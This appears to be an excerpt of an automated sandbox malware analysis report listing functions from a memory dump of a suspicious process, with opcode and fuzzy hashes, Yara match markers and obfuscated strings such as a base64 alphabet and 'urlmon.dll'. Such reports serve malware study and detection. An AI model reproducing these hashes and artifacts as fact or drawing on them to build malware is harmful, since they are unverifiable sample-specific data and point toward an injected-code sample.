                                                • Opcode ID: e5017393e80304b80e82970dd539f71a276d3f5cebbabe2b3b40e97ad5c5fb0a
                                                • Instruction ID: 9e8034037cbc78ef4f9828c302993266a85a1e97459ed9ef48ac0ddadb568450
                                                • Opcode Fuzzy Hash: e5017393e80304b80e82970dd539f71a276d3f5cebbabe2b3b40e97ad5c5fb0a
                                                • Instruction Fuzzy Hash: FAF01C762006057BDB10EE99DC41EAB77ADEFC9610F004419FD19A7245D670B9118BB4
                                                Function 039431F8 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dc53270e81e8118875e8876ff73b5f2fe330d8af91f418a7947fd4134be5c32
                                                • Instruction ID: d35dc64f3b518a45f1ed35d3b9b457d24ece356c47c2553923ab90a976af41c5
                                                • Opcode Fuzzy Hash: 1dc53270e81e8118875e8876ff73b5f2fe330d8af91f418a7947fd4134be5c32
                                                • Instruction Fuzzy Hash: 37F036B590021569DB24FBA4DD49FAEB379DB84710F00418DB90D6B254EA7059D48B51
                                                Function 0394315F Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                • Instruction ID: 2b3db70be7298e5155cdaedf054545ef6a3c8c934c2e03317d29f5d8d30beae8
                                                • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                • Instruction Fuzzy Hash: B8F08275C15208EBDB14DFA4D881BDEFBB8EB04360F1043ADE8259B2C0D73497608795
                                                Function 0395478F Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 418242098c58ec91757ec449f84ce90047456cc015d02c051a4eceff550d5f82
                                                • Instruction ID: 3b142b53409c43037369b113f37da4b41e777a7fa52b3b98ecdf885e2c681c8c
                                                • Opcode Fuzzy Hash: 418242098c58ec91757ec449f84ce90047456cc015d02c051a4eceff550d5f82
                                                • Instruction Fuzzy Hash: 68E065762013147BD610EE58DC41FABB7ADEFCA710F004409FD09AB241CA71B9208BB4
                                                Function 0395663F Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 596132ecb34c59f0ddb36b9760fb0286cd8603c5f4a80a58c74a8aa198bc17a6
                                                • Instruction ID: d10c2a264e9ab451306b8e9e35778066c4eeb5c422d55e5575f68faaa6966b6c
                                                • Opcode Fuzzy Hash: 596132ecb34c59f0ddb36b9760fb0286cd8603c5f4a80a58c74a8aa198bc17a6
                                                • Instruction Fuzzy Hash: 33E0863774231437C220E59D9C05FA7B76DCBC1E60F590074FE089F344E561A94183E5
                                                Function 0392F62A Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64d783b29f99dca73f5935a3eb4dc6309f6f27a9481b04ea9412a3b2e512d4fc
                                                • Instruction ID: d5a54973e96ac11d8f67a348b46ed2c2d71235c40c24fbc39b831aa0b8cebf61
                                                • Opcode Fuzzy Hash: 64d783b29f99dca73f5935a3eb4dc6309f6f27a9481b04ea9412a3b2e512d4fc
                                                • Instruction Fuzzy Hash: A0E0267340416B6EC7159A6D5C80C8BFFADEAC93343290325E4599B362D6318422C790
                                                Function 0394315E Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d97c667bfe178a1ed9f54a9e416e185a927e75da737129d3c28d40d293dd74d
                                                • Instruction ID: 1552dfb3a99780ea1f22287cc1b9c9bc820046dcac56d84856b499268e97dacc
                                                • Opcode Fuzzy Hash: 2d97c667bfe178a1ed9f54a9e416e185a927e75da737129d3c28d40d293dd74d
                                                • Instruction Fuzzy Hash: 2EE06575815108AADB14CB74D8C1BEDBB74DB092A1F1447ADE815DB280D73587948754
                                                Function 0395447F Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3dc6c1de3246d7d3cba71d54e37f4708369b9336210067afd53c27288663b7b
                                                • Instruction ID: a7456e10ea4a13cb41c461e9ae313231b19365bbd77de840b8856325d18e3e44
                                                • Opcode Fuzzy Hash: a3dc6c1de3246d7d3cba71d54e37f4708369b9336210067afd53c27288663b7b
                                                • Instruction Fuzzy Hash: 81E0463A2013147BC220FA69DC00F9BB76DEBC6720F008416FA0DAB241C671B91187A5

                                                Non-executed Functions

                                                Function 0392F220 Relevance: 53.9, Strings: 43, Instructions: 106COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #22.$#6+-$#='7$'SE]$+!#6$+-,m$,m:*$0SE]$5HS]$6'S0$6'S0$6'S0$6/.i$6SK]$:/.n$:/.y$<$EG$=6'G$?!S@$?!S@$?!SA$?00A$B$BHS$$CDAD$CDAJ$CDAJ$CHS $CHS$$CHS0$G]CS$HS]=$HS]=$HS]=$S> :$]C0Z$]C0Z$]C]@$]C]F$]F]@$rlz$s${nhm
                                                • API String ID: 0-2268438424
                                                • Opcode ID: c908144605b3ba7ea1857f21c0d6603293501b1e2d08cc4b97bf5923ea328953
                                                • Instruction ID: 15059f5d9abaf2b06d974ab527b4ce773c9da9a064b8c69227f9c35ca98a269f
                                                • Opcode Fuzzy Hash: c908144605b3ba7ea1857f21c0d6603293501b1e2d08cc4b97bf5923ea328953
                                                • Instruction Fuzzy Hash: A851E2B4D053989FCB24CFA4DA8079EFFB1FB05304FA18588D16A6B205D7B51A82CF56
                                                Function 0393EEC2 Relevance: 51.4, Strings: 41, Instructions: 171COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                • API String ID: 0-3248090998
                                                • Opcode ID: b5bcb8c72f43d16ead8a8f65466c96c1e2c4146fe9b1d7ece4b2a73fd06e8f08
                                                • Instruction ID: afe356ec95ef77378386d8a716de2542a627f60dac36026f01a179f86818f3fa
                                                • Opcode Fuzzy Hash: b5bcb8c72f43d16ead8a8f65466c96c1e2c4146fe9b1d7ece4b2a73fd06e8f08
                                                • Instruction Fuzzy Hash: 1191F0F09052998ACB118F95A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E45DF90
                                                Function 0393EECF Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                • API String ID: 0-3248090998
                                                • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                • Instruction ID: 31acb580cfa666ea87f6a05ff91b7b5c793475595b72ad0feb84450270411be0
                                                • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                • Instruction Fuzzy Hash: 5791FFF09052A98ACB118F95A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E45DF90
                                                Function 0392F22F Relevance: 40.1, Strings: 32, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #='7$'SE]$0SE]$5HS]$6'S0$6'S0$6'S0$6SK]$<$EG$=6'G$?!S@$?!S@$?!SA$?00A$BHS$$CDAD$CDAJ$CDAJ$CHS $CHS$$CHS0$G]CS$HS]=$HS]=$HS]=$S> :$]C0Z$]C0Z$]C]@$]C]F$]F]@$s
                                                • API String ID: 0-1714249929
                                                • Opcode ID: ac967a822fc9e766032eaf4da1a55313e14ff732255860f356699ebbd277c8cb
                                                • Instruction ID: f8e4e5fb3bc7b8cf4df1adfe31555e6e9ed0c90119c32d5a1bace7ae8272dcf7
                                                • Opcode Fuzzy Hash: ac967a822fc9e766032eaf4da1a55313e14ff732255860f356699ebbd277c8cb
                                                • Instruction Fuzzy Hash: F341BBB4D053989FCB20CFA49A4068EFFB1FB02304FA18588D16A3B245C7B01A86CF56
                                                Function 0394DA5F Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-1002149817
                                                • Opcode ID: 6814968327f2795ece017bc0baa0922abdfa38e0451b9f90ddaf43d6b07e0ab8
                                                • Instruction ID: b4eb644628dbd681a8b3cba378ee53d9328f459f7a0d8f88d3e7880ffbfff5ff
                                                • Opcode Fuzzy Hash: 6814968327f2795ece017bc0baa0922abdfa38e0451b9f90ddaf43d6b07e0ab8
                                                • Instruction Fuzzy Hash: 3BC12DB5D013289AEB21DFA4CC54BEEBBB9AF45304F0081D9D50CBB241E7B55A88CF91
                                                Function 0394A8AF Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: 5a5cab11ff9b37a7081a63a4e22d2d1fd7fe121d8d6b709de8ed4641f0101638
                                                • Instruction ID: 725323d9e2da27083b43623484736bda11a8c80950168d42fbd9a6d5afc6bec4
                                                • Opcode Fuzzy Hash: 5a5cab11ff9b37a7081a63a4e22d2d1fd7fe121d8d6b709de8ed4641f0101638
                                                • Instruction Fuzzy Hash: B6914EB5951318AEEB20DF948C50FEEB7BDEF85304F4041A9EA0CAA140E7755B898F61
                                                Function 0394A8A0 Relevance: 25.1, Strings: 20, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                • API String ID: 0-3236418099
                                                • Opcode ID: 9bc57109db746f46d7c45fb247683f0f1ab6da0668c1effc42b5c9168f9ec8f7
                                                • Instruction ID: 3b0623e8a28405d52ff3fdde8a025d3b4f9716bf9c4df3e4df074fcacb321870
                                                • Opcode Fuzzy Hash: 9bc57109db746f46d7c45fb247683f0f1ab6da0668c1effc42b5c9168f9ec8f7
                                                • Instruction Fuzzy Hash: 614139B0C013589FEB20DFA58854BDEBBF9FF45348F4041A9950CAB251D7B55A88CF51
                                                Function 039357D1 Relevance: 22.6, Strings: 18, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $*$+'$+D$:$;j$=$C;$F($O$R$h$i$p3$q$r$+$O
                                                • API String ID: 0-4060930160
                                                • Opcode ID: f8fb2c3dca9aeb561290f44a117d8fb03b212ec598e33aea395f36f92aea0989
                                                • Instruction ID: 536ad083b8c2164202248524905b3388eee774b698538aedab65b0868b92f8dc
                                                • Opcode Fuzzy Hash: f8fb2c3dca9aeb561290f44a117d8fb03b212ec598e33aea395f36f92aea0989
                                                • Instruction Fuzzy Hash: 9E7158B0C05269CBFB21CF91C9987DDBBB1BB05308F1081D9C1497B291C7BA1A89CF91
                                                Function 0392F170 Relevance: 18.8, Strings: 15, Instructions: 43COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #22.$#6+-$+!#6$+-,m$,m:*$.n#2$2.+!$6':6$6/.i$:/.n$:/.y$B$m*6/$rlz${nhm
                                                • API String ID: 0-199465615
                                                • Opcode ID: e388787e124abb4d239699cb131ad40dedc39f51b9a2efb198cb12fdb8da3165
                                                • Instruction ID: 704f4b095ce58642d246415ec741021995d1e7e8831239d05d1d1d57a2f991d0
                                                • Opcode Fuzzy Hash: e388787e124abb4d239699cb131ad40dedc39f51b9a2efb198cb12fdb8da3165
                                                • Instruction Fuzzy Hash: D41145B5C1530E9BCB11CFA4EA857ADBF74FB09200FA04258EA516A201D3754A06CF58
                                                Function 0392F17F Relevance: 18.8, Strings: 15, Instructions: 37COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #22.$#6+-$+!#6$+-,m$,m:*$.n#2$2.+!$6':6$6/.i$:/.n$:/.y$B$m*6/$rlz${nhm
                                                • API String ID: 0-199465615
                                                • Opcode ID: eff0940a4b7afcf400868d61cb714a1f8ad63ae8e6ce4936f489ce28e807d92c
                                                • Instruction ID: f6b0e37b913fdceab2727c0068a6c2edb60f6a69b80f082fa1f688d4dd87ac8c
                                                • Opcode Fuzzy Hash: eff0940a4b7afcf400868d61cb714a1f8ad63ae8e6ce4936f489ce28e807d92c
                                                • Instruction Fuzzy Hash: 300153B0C1531D9BCB14DF95EA857DDBF34FF04240FA09258EA022A205E3755A02CF99
                                                Function 0394603F Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: 0165e0177b1e264912b305ae300c3bd55e0a01041fa16ac63b417c119b9734f5
                                                • Instruction ID: a1dd53e1e59026c3136195b94f713ecfb4cebd6f6f2f73ead2a012faa9e80761
                                                • Opcode Fuzzy Hash: 0165e0177b1e264912b305ae300c3bd55e0a01041fa16ac63b417c119b9734f5
                                                • Instruction Fuzzy Hash: 03710CB5D00318ABDB15DF94CC90FEEB7BDAF44700F408199E919AA240E7755B88CFA5
                                                Function 03946037 Relevance: 16.4, Strings: 13, Instructions: 178COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: 765718b9bdaac97d69c9694484de73f3708ecebe9b089f7f37f16740d9697352
                                                • Instruction ID: c9b4eaadb7c373e2ec4ded916da2064d86e1ac70470ab977ec7e7a6c9a32406c
                                                • Opcode Fuzzy Hash: 765718b9bdaac97d69c9694484de73f3708ecebe9b089f7f37f16740d9697352
                                                • Instruction Fuzzy Hash: C4611CB5C00318ABDB15DFA4CC90FEEB7B9AF48700F404199E919AA240E7755B88CF65
                                                Function 03939C0F Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: a77e78608a4c75038fc4c13ea3fde96c4ea3ed3365bda5fa76354335cba23522
                                                • Instruction ID: 61a662c1cf8b33f01f294279514e36a2481b9986d808dc77fa1ba9f9b9737cd6
                                                • Opcode Fuzzy Hash: a77e78608a4c75038fc4c13ea3fde96c4ea3ed3365bda5fa76354335cba23522
                                                • Instruction Fuzzy Hash: 9D216FB5D41318AAEB40DFA4CC45FEEBBB9AB44704F008158FA18BA180DBB516488BA5
                                                Function 03939C06 Relevance: 13.8, Strings: 11, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: 7a8e0b7b56b0e54f5d4444a549a954b69a7da5981da711a970eadf4bd6ee9481
                                                • Instruction ID: 7e6681b679660e46114ff9710ae6032227fd1d38e65148275358935db06dd9c9
                                                • Opcode Fuzzy Hash: 7a8e0b7b56b0e54f5d4444a549a954b69a7da5981da711a970eadf4bd6ee9481
                                                • Instruction Fuzzy Hash: 3D216DB5D51318AAEB40DFD4CC84BEEBBB9AF44704F10815DF618BA180DBB516488FA5
                                                Function 0394AD6F Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: ad01ff0855174a00e48f4ee7f7f315d677bc6d1ae16610b168e49126fb24e581
                                                • Instruction ID: 7ff7342b67717fd756cf16368795ab764482057e50db2305c4f8d84beaecaaad
                                                • Opcode Fuzzy Hash: ad01ff0855174a00e48f4ee7f7f315d677bc6d1ae16610b168e49126fb24e581
                                                • Instruction Fuzzy Hash: 7ED1FAB6900708ABDB50DFA4CC50FEEB7B9AF88310F44851DE919DB240E778AA45CF61
                                                Function 0394AD6E Relevance: 12.7, Strings: 10, Instructions: 208COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 46c1bb462336c1335b3d7cdcfb579c128b6c96930d0032d010061750064a5a9a
                                                • Instruction ID: 41ccf829a803d41c09d12a5d421219aecd6718b6e74c3037f109e902dd40994e
                                                • Opcode Fuzzy Hash: 46c1bb462336c1335b3d7cdcfb579c128b6c96930d0032d010061750064a5a9a
                                                • Instruction Fuzzy Hash: CE8107B6900308AFDB50DFA4C850FEEB7B9AF88310F44851DE519EB240E779AA45CF65
                                                Function 0394110C Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: 6bcd80dffd18ba676cc6aa5c53d2caf8e87e2d21056555bd365f3761e66815a1
                                                • Instruction ID: dc93e1636f62f0e6bc13333d8c879e38703c439b1b9f6e0749a9172acd3e5e1a
                                                • Opcode Fuzzy Hash: 6bcd80dffd18ba676cc6aa5c53d2caf8e87e2d21056555bd365f3761e66815a1
                                                • Instruction Fuzzy Hash: 8F4163B9D003187BDB21EFA4DC50EDB777CAF95300F408599B90DAB140EAB557898FA1
                                                Function 0394110F Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: fbd7a7ea1c8676b6c7bbfaa6d49c05a784b0daad77f27131974734ef91f13155
                                                • Instruction ID: 9486a5d2f0950765adfbd9567c3cdbdd26005f747cbe0b009623588f18a4f2ec
                                                • Opcode Fuzzy Hash: fbd7a7ea1c8676b6c7bbfaa6d49c05a784b0daad77f27131974734ef91f13155
                                                • Instruction Fuzzy Hash: 644163B9D0031866DB21EFA4DC50EDB777CAF95300F408599B90DAB140EAB557898FA1
                                                Function 03932C2F Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$2$7$7$^$^$p$|
                                                • API String ID: 0-3056927568
                                                • Opcode ID: 158743b37979adee1e1d9a127d638bf4e5d90dff2ed699cc78d2d2c3ba0cc588
                                                • Instruction ID: 0eb4ef8dff9fc28441d6b005ff4fdba0039e3865be510f84f5d0ca313c295c44
                                                • Opcode Fuzzy Hash: 158743b37979adee1e1d9a127d638bf4e5d90dff2ed699cc78d2d2c3ba0cc588
                                                • Instruction Fuzzy Hash: D411BB50D0C7CAD9DB12C7BC84086AEBFB15F23224F0887D9D4E46B2D2D27A4706C7A6
                                                Function 0394E2BF Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 9c2784b8046db6796b451d2035214bc31f8aad1d2d7a82a7c40f6fc9011f1246
                                                • Instruction ID: 6dea0ed7b063f236c27c8a31ad2191854a914dc788126cd66fcef58c37139eb9
                                                • Opcode Fuzzy Hash: 9c2784b8046db6796b451d2035214bc31f8aad1d2d7a82a7c40f6fc9011f1246
                                                • Instruction Fuzzy Hash: 574186B6D00318AACB10EF98DC84EEEB7F8BF48310F45955AE919AB200E77155858F90
                                                Function 03945DFF Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: a6aee0fa193b127372b375979f9acb7962075c04a7853e442710165e0255d989
